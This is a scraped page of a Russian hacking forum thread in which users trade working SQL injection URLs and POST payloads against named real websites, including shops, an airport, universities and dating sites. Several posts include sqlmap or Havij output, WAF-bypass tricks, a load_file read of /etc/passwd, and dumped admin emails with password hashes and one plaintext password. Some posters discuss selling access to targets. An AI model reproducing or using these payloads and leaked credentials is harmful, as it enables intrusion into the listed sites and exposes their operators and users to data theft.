ANTICHAT - SQL Инъекции

Страница 2 из 7

Последняя »

Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - SQL Инъекции (https://forum.antichat.xyz/showthread.php?t=424558)

powerOfthemind

31.07.2015 15:33

Цитата:

Сообщение от goot

↑
Привет все!
Дырка есть базу выдает но там joomla 3.3.1 хеш с солью высыпает
И фильтр не пропускает логин админа(((

Код:

http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'

Там только перебор бессмысленный сразу инжектировать нужно
Я через софт Havij v1.16 скачал базу

Код:

Target:         http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%

Host IP:        91.236.136.194

Web Server:     nginx

DB Server:     MySQL error based

Resp. Time(avg):    85 ms

Sql Version:     5.5.43-0+deb7u1-log

Compile OS:     debian-linux-gnu

Host Name:     ura.webhost1.ru

Current DB:     sergei62_og

Installation dir:     /usr

данные админа
povar.admin@gmail.com
$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO
Залить не получилось(( не нашел пути
Кто сможет раскопать отпишите в личку (Как удалось?)
P.S. на сервере фильтрация на количество запросов в минуту! Так что не спишите)))

Хэш очень похож на OpenBSD Blowfish

Логин подозреваю будет Admin

Вот что удалось вытянуть,подозреваю уже кто-то залез в админку

coolxacer@list.ru:$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO!

povar.admin@gmail.com:$2y$10$.qPZfqEzdniT1gOnrmQGWeZ9ZRikV1ic4aFrCmRUCW Fk4u9wVBkqC!

Вот что удалось найти по типу таких хэшей,ничего не понял ,но может кому пригодится http://habrahabr.ru/post/211645/

Код:

http://dir.rusmedserv.com/index.php?t=sub_pages&cat=-4+UNION+SELECT+1,2,user(),4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

Ну и бонусВот интерестная inject. дальше не получатся залезть,если есть идеи в ПМ пож.

K1nD[e]R

01.08.2015 13:53

btc

Код:

Post[URL]: http://www.vitalcoin.com/order_ajax_request.php

Post[data]: Action=IsUserLogedIn&TransactionMode=2&TransactionType=PKR and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

Код:

Warning:  mysql_query(): Unable to save result set in /home/vitalcoi/public_html/models/order.php on line 88



Duplicate entry '~'vitalcoi_dbuser@localhost'~1' for key 'group_key'

Код:

Админка под Basic

UserID,UserName,Password=16^kitharass^56c87d0571ee5a4da6793583164da8f4:kitharass@gmail.com

UserID,UserName,Password=14^admin^Vital!@#:faag786@gmail.com

UserID,UserName,Password=15^maria^55913d077666fa9d9b5a0a35c718ba38

Mister_Bert0ni

04.08.2015 16:09

Код:

www.meleeboys.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'

',password),222+from+jos_users--%20-

www.skala-club.vn.ua/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'

',password),222+from+jos_users--%20-

toxic.h5n1.free.fr/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'

',password),222+from+jos_users--%20-

spherics

04.08.2015 16:32

Код:

http://casu.us/online_programs.php?id=-1+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5--

5.0.96-log

casuni@184.168.152.78

casuni

Powered By: Friends IT Solution (дырявые все)

Пробую их самих разобрать.

Unknowhacker

05.08.2015 13:45

The NORTH FACE

Код:

http://north-face.com.ua/search/?searh=%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27

Версия: 5.5.42-37.1

grimnir

06.08.2015 17:35

www.nowinstock.net трафф 580к

Код:

Parameter: #1* (URI)

    Type: boolean-based blind

    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

    Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 RLIKE (SELECT (CASE WHEN (2936=2936) THEN 1 ELSE 0x28 END))



    Type: error-based

    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)

    Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 AND EXTRACTVALUE(4360,CONCAT(0x5c,0x71786a6a71,(SELECT (ELT(4360=4360,1))),0x71626a7071))

---

web application technology: Apache

back-end DBMS: MySQL 5.1

База sdfs4f_main

powerOfthemind

08.08.2015 19:05

Код:

http://www.pourmaplanete.com/news/novel.php?ID=-151+UNION SELECT 1,user(),version(),4,5,6,7,8,9,10,database(),12,13--

http://www.tovary2.ru/a-general.php?id_gorod=-74+UNION SELECT 1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,16,17,database(),19,20,21,22,23,24,25,26,27,28--

http://velostar.ru/guest.php?active_page=-1500+union+select+1,2,3,4,5,version(),7,8--

Вывод в title

grimnir

16.08.2015 16:30

papersource.com трафф 430к

Код:

Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' RLIKE (SELECT (CASE WHEN (4297=4297) THEN 1 ELSE 0x28 END)) AND 'DiTO'='DiTO.html Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' AND EXTRACTVALUE(1565,CONCAT(0x5c,0x71626a6b71,(SELECT (ELT(1565=1565,1))),0x716a787871)) AND 'DncI'='DncI.html

back-end DBMS: MySQL >= 5.0.0

databases:

paper

WallHack

25.08.2015 22:58

Код:

http://testmat.ru/mat_test.php?id=-2+union+select+1,2,3,4,user,password,7,8,9,10,11,12+from+users+--+

Код:

http://www.yarohranatruda.ru/order.php?id=-377%27+union+select+1,admin_name,admin_passwd,4,5+FrOm+admin+--+

Админка

Код:

http://www.yarohranatruda.ru/admin/

Код:

http://russkayabronza.com/1/order.php?id=-866'+union+select+1,2,3,4,5,6,7,8,9+--+

Админка

Код:

http://russkayabronza.com/adm.php

Muracha

31.08.2015 21:26

Код:

http://koreamed.org/JournalVolume.php?id=-200+union+select+user%28%29--

использовал вкупе с sqlmap
[*] information_schema
[*] KoreaMed
[*] test

Адовое количество таблиц, возиться не стал.

Код:

http://www.findfilehost.com/filehost.php?id=-2+UNION%20+select%20+%20%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

режет mod_secure

Код:

http://www.jamrid.com/RiddimDetail.php?ID=-1677+union+select+1,convert%28concat_ws%280x3a3a,version%28%29,user%28%29,database%28%29%29+using+latin1%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Проблема с кодировкой, неверно выводит и просто вывести version() нельзя. Нужно воспользоваться фукцией convert()

convert(version()+using+latin1)

в итоге есть:

4.1.14::soundman@localhost::RiddimDB

WallHack

01.09.2015 18:27

Код:

http://toefilm.ru/view_post.php?id=-32%27+union+select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15+--+

Га-Ноцри

16.09.2015 00:55

Аэропорт, вроде не самый маленький в этих ваших Европах. Присутствует фильтр обходится внедрением в любую часть %0B, например union -> uni%0Bin, information_schema.tables -> infor%0Bmation_schema.tables и далее по аналогии.

Тиц == 110, PR == 6, Alexa == 120,422

Код:

http://www.koeln-bonn-airport.de/index.php?id=147&L=0&q=1'or(extractvalue(rand(),concat(0x3a,(Sel%0BeCt(concat_ws(0x3a,version(),user()))))))='1

Онлайн бронь на авиабилеты и все что с этим связано. Вывод в сорсе

Тиц == 10, PR == 0, Alexa == 390,710

Код:

http://www.parkrideflyusa.com/booking-details?id=-31 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x03a,version(),database(),user())--

ButilkaSoka

20.09.2015 05:11

общего трафика много вроде , 2,7kk, субдомен pmi.org

Код:

http://learning.pmi.org/course-detail.php?id=-3582+union+select+all+1,concat(user(),0x3a,database(),0x3c62723e,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+limit+0,1--

pmiprof@184.168.193.187: pmiprof

5.0.96-log

игры для консолей

Код:

https://www.playonrent.com/gameDetails.php?id=137 and (select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'A883245_sidhant@173.83.247.2321' for key 'group_key'

5.1.69-community-log

WAF

Код:

http://www.e-wigs.com/wigs.php?id=-1773 UNION SELECT 1,2,3,4,5,concat(user(),0x3a,database(),0x3c62723e,version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27  limit 0,1

Вот обоход

Код:

http://www.e-wigs.com/wigs.php?id=-1773/*!union*//*!12345%73%65%6c%65%63%74*/1,2,3,4,5,concat%28user%28%29%2C0x3a%2Cdatabase%28%29%2C0x3c62723e%2Cversion%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns  where TABLE_schema=database%28%29 limit 0,1

dbo472536571@74.208.16.148:db472536571

5.1.73-log

Код:

http://www.fckhimki.ru/modules/players/index_d.php?current_id=15&player_id=-111+union+select+1,2,3,4,version(),6,7,8,9,10 --

5.0.90-log

3nvY	21.09.2015 21:38

Код:

http://www.season.ru/forum/profile.php?f=5&id=-1556%27+union+select+1,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14--+

DezMond™

22.09.2015 19:02

Код:

https://www.htw-dresden.de/index.php?id=9147&vid=239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+

st1x0

08.10.2015 11:14

Была разминка, думал что сойдет для продажи но мелочи думаю... может кому полезно будет или трафферам.

Код:

ttp://torrent.tlt.ru/browse.php?cat=5

web server operating system: Linux Ubuntu

web application technology: PHP 5.3.2, Nginx

back-end DBMS: MySQL 5.0

available databases [2]:[*] information_schema[*] tracker

Код:

mega-torrent.ru/browse.php?cat=18

Warning: mysql_fetch_array() expects parameter 1 to be resource

Код:

http://www.guildvalhall.eu/inc-news.php?id=8429

web application technology: Apache

back-end DBMS: MySQL 5.0.12

available databases [2]:[*] information_schema[*] valhall

Инфы много.)

WallHack

11.10.2015 09:19

Код:

http://xn--h1acbqf.xn--e1apq.xn--p1ai/view_dokum.php?id=-37%27+union+select+1,@@version,3,4,5,6,7,8,9,10+--+

WallHack

13.10.2015 15:11

Зарубежный сайт знакомств

Код:

http://staynaughty.com/wall.php?uid=442%20and%20(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Сайт анонимных знакомств и раврата...

Код:

https://sexintime.at/wall.php?uid=101899%20%20and%20(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

ButilkaSoka

17.10.2015 20:47

Вывод в заголовке, или в сорсе

Код:

http://www.uaces.org/events/calendar/event.php?id=1 /*!50000UnION*/ SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 --

5.5.42-cll

Спортивное снаряжение Twins

Вывод в заголовке, или в сорсе

Код:

http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,version(),26,27,28,29 or ''='

twinsspe_twins@localhost

5.5.36-cll

twinsspe_twins

Шоп

Код:

http://www.patersonphotographic.com/category.php?categoryID=1 and extractvalue(null,concat(0x3a,(select concat_ws(0x3c62723e,user(),version()))))

plummo@localhost

5.1.73

plummo_shop

Код:

http://www.dfki.de/lt/card.php?id=-185 and 1=1 UNION SELECT 1,user(),version(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30  --

staff_user@lnv-101

4.0.21-Max

staff

Код:

http://www.ghasham.com/products-category.php?id=-6 /*!50000and 1=1*/ /*!50000uNIoN*/%09/*!50000seLEC%74*/%091,2,/*!50000unhex(hex(coNcat_ws(0x3a,user(),version(),database())))*/,4,5,6,7,8,9,10,11,12,13 --

ghashamo_user@localhost

5.5.42-37.1

ghashamo_db

Шоп

Код:

http://www.mcfarlandbooks.com/book-2.php?id=-978-0-7864-7807-1'+/*!50000UnIoN*/+all+/*!50000SeLeCt*/+1,2,/*!50000coNcat_ws(0x3c62723e,user(),version(),database())*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+--+and '1'='1

mcbooks_dbuser@localhost

5.5.42-37.1

mcbooks_mainsite

DezMond™

23.10.2015 22:00

Код:

http://www.industrie4-summit.de/soap/showProgramDetails.php?eventId=45&language=de&opener=/programm.html&id=27121+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+from+information_schema.tables+--+

5.5.44-0+deb7u1-log

Waki	26.10.2015 20:37

Код:

http://www.ugon.kz/index.php?option=com_ncatalogues&controller=ajax&task=multiselect&id=28%20UNION%20ALL%20SELECT%20NULL,version%28%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&JsHttpRequest=14458949481000-xml

5.5.44-cll-lve

xivi00

01.11.2015 04:23

Код:

http://bol24.ru/'or(ExtractValue(1,concat(0x3a,(select(version())))))='1



http://casino-e.org/'or(ExtractValue(1,concat(0x3a,(select(version())))))='1

xivi00

03.11.2015 17:24

Код:

http://frisbee-pay.ru/client/'or(ExtractValue(1,concat(0x3a,(select(user())))))='1

xivi00

04.11.2015 02:20

Код:

http://www.iqpartner.info/ru/?CATALOG=hosting_tariff%27or(ExtractValue(1,concat(0x3a,(select(user())))))=%271

Код:

http://platforma.ru/'or(ExtractValue(1,concat(0x3a,(select(user())))))='1

WallHack

07.11.2015 09:48

Яндекс Тиц http://pr-cy.ru/static/img/yandex-bar/bar4.gif 210 - Google Page Rank 3/10

Яндекс Каталог Да-DMOZ.org каталогДа

Код:

http://www.soate.ru/news/new.php?id=-54+union+select+version(),2,3,4,5+--+

Версия:5.5.44-1+wheezy1+mh1-log

OSW	20.11.2015 16:30

Код:

http://www.allomebel.ru/shop/?dir=-9%20union%20select%201,2,3,4,5,version%28%29,7,8,9%20--

5.5.30-log

ЯК, тиц 70

Код:

http://www.fortland.ru/index.html?action=catalog&id=-6%20union%20select%201,2,3,4,5,6,version%28%29,8,9,10,11

5.5.46-cll

ЯК, ТИЦ 200

wkar	23.11.2015 22:47

Код:

http://www.rinekekop.nl/get_item.php?id=33'/*!50000UNION*//*!50000SELECT*/1,2,version(),user(),5-- -

5.5.42-cll-lve

ijsvogel@localhost

WallHack

24.11.2015 17:23

Яндекс Тиц http://pr-cy.ru/static/img/yandex-bar/bar4.gif 230 - Google Page Rank 3/10

Яндекс Каталог Да - DMOZ.org каталог Нет

Код:

http://basket.ugmk.com/ru/news/index.php?id15=-10394+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+

xivi00

24.11.2015 17:56

Код:

http://inet.pushkino-telecom.ru/index.php?id=qiwi-pay%27or(ExtractValue(1,concat(0x3a,(select(user())))))=%271

Vip77

12.12.2015 01:39

Траф 50к

Pr 5

Код:

http://astroscope.ru/blog/rate.php?id=-2842'+or+1+group+by+concat(0x7c,(select+mid((ifnull(cast(schema_name+as+char),0x20)),1,54)+from+information_schema.schemata+limit+1,1),0x7c,floor(rand(0)*2))+having+min(0)%23

WallHack

13.12.2015 12:00

Код:

http://wmfast.com/news.php?id=-10%27+union+select+1,2,3,4+--+

Vip77

16.12.2015 17:52

Трафик 85к

Тиц 800

PR 5

Код:

http://novostimira.com/videonews.php?act=view&id=1' and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1

Vip77

17.12.2015 21:08

Трафик 100к

Тиц 1600

Pr 7

File_priv=Y

Код:

http://pogoda.by/climat-directory/index.php?year=1'+union+all+select+concat(0x7e,0x27,load_file('/etc/passwd'),0x27,0x7e),1,1,1--+

ServerName pogoda.by

/var/www/html

ServerName pda.pogoda.by

/var/www/html/pda

ServerName meteoinfo.by

/var/www/www.meteoinfo.by

ServerName 6.pogoda.by

/var/www/html/six

R3hab

27.01.2016 13:59

THE OTHER WORLD KINGDOM 18+

Код HTML:

http://www.owk.cz/philosophy-operation/whoweare/subject.php?id=-9%20union%20select%201,version(),database(),user(),5,6,7,8,9,10--+f

ТИЦ10

PR3

AR405,200

Visits 25K

5.1.73-1+deb6u1wk:OWK_shop@localhost

WallHack

01.03.2016 16:28

RU SHOP

Код:

http://thedespair.ru/product/0'+UnIon+selECt+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+

5.5.35-rel33.0-log

Waki	03.03.2016 07:40

Код:

http://www.colinst.com/brief.php?id=51%20and%20(select%201%20from(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

Duplicate entry 'root@localhost1' for key 1

Версия 5.0.671

Присутствует waf на union select

WallHack

06.03.2016 13:46

Тиц 60 PR 3

Код:

http://www.eastoftheweb.com/short-stories/index.php?p=web/author/GuydeMaupassant%27+union+select+@@version,2+--+

grimnir

09.03.2016 10:46

В помощь Милонову

gaycities.com 253к голубцов

Код:

h**p://www.gaycities.com/biz/account/biz_activate.php

POST:pwsubmit=Verify Email Address&c=0c425b5&code=94102&referrer=http://www.gaycities.com/biz/account/&un=1') RLIKE (SELECT (CASE WHEN (666=666) THEN 1 ELSE 0x28 END)) AND ('gayS'='gayS

WallHack

10.03.2016 13:05

Код:

https://www.billykfitness.com/fitness/index.php/pay?pid=1%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))%20--

5.1.731 for key

WallHack

14.03.2016 14:56

Тиц 325 Pr 3

Код:

http://www.ph4.ru/h_CITIES.php?d=2154+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,@@version,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60+--+

5.5.44-37.3-log

Время: 06:27

Страница 2 из 7

Последняя »

Показывать 40 сообщений этой темы на одной странице